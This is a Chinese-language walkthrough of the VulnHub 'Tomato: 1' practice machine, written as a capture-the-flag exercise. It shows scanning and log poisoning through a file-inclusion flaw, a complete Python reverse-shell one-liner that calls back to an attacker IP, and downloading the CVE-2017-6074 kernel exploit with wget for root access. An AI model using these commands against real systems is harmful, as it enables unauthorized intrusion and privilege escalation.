VulnHub渗透测试实战靶场 - Tomato：1

环境下载

• 戳此进行环境下载

Tomato：1靶机搭建

将下载好的靶机导入Vmware，网络连接设置为NAT模式即可

渗透测试

信息搜集

• 用arp-scan探测一下网段内目标靶机的IP：sudo arp-scan -l
• 得到目标靶机的IP为：192.168.246.137

• 使用 nmap 扫描开放的端口：sudo nmap -sC -sV -p 1-10000 192.168.246.137，发现开放了 21、80、2211、8888 四个端口

• 使用 dirb 扫描一下开放的 80 端口：dirb http://192.168.246.137

漏洞挖掘

• 访问 http://192.168.246.137/antibot_image/ 发现存在目录 antibots，接着访问该目录，发现存在很多文件

• 访问 http://192.168.246.137/antibot_image/antibots/info.php，找到 phpinfo 的信息，F12查看源码发现 hint，存在文件包含漏洞

getshell

• 前面信息搜集时发现开放了 2211 端口，服务为 ssh，尝试对日志文件写入 shell，然后包含日志文件
• 先查看日志文件是不是在默认路径：http://192.168.246.137/antibot_image/antibots/info.php?image=/var/log/auth.log

• 利用 ssh 连接，写入一句话木马：ssh ''@192.168.246.137 -p 2211

• 查看靶机是否安装了 python，whereis python，可以看到目标靶机安装了python3，那就可以利用 python 进行反弹了

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.246.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

• 执行命令 python3 -c 'import pty;pty.spawn("/bin/bash")' 将 shell 变为交互式的 shell

提权

• 执行命令 uname -a 查看 linux 内核版本，寻找有无可以利用的 exp，exp链接

• 运行 compile.sh 编译c文件，然后在 kali 上用 Python 起一个 Http 服务，python2 -m SimpleHTTPServer 8888，接着在靶机用用 wget 命令 wget http://192.168.246.129:8888/CVE-2017-6074下载 exp

• 给 exp 赋予执行权限 chmod +x CVE-2017-6074

• 运行 exp，拿到 root 权限